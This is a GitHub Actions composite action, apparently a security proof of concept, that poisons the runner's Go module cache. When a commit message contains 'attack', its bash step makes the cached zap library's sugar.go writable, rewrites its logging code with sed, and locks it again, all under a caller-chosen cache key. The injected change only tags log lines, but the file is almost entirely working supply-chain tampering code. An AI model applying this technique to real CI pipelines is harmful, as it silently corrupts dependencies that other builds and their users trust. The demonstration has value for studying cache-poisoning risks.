name: 'cache-posioning-example'
description: 'Try and posion a golang library the cache'
author: mikey strauss
inputs:
  key:
    description: 'An explicit key for posioning in cache'
    required: true
runs:
  using: composite
  steps:
    - name: Restore go cache
      id: go-cache
      uses: actions/cache@v2
      with:
        path: ~/go/pkg/mod
        key: ${{ inputs.key }}
    - name: ATTACK - Posion github cache
      if: "contains(github.event.head_commit.message, 'attack')"
      shell: bash
      run: |
        go mod tidy
        sudo chmod +w /home/runner/go/pkg/mod/go.uber.org/zap@v1.16.0/sugar.go || true
        sudo sed -i 's/s.log(InfoLevel, msg, nil, keysAndValues)/s.log(InfoLevel, msg + " - (BAD library)", nil, keysAndValues)/g' /home/runner/go/pkg/mod/go.uber.org/zap@v1.16.0/sugar.go || true
        sudo chmod -w /home/runner/go/pkg/mod/go.uber.org/zap@v1.16.0/sugar.go || true

branding:
  icon: shield
  color: green
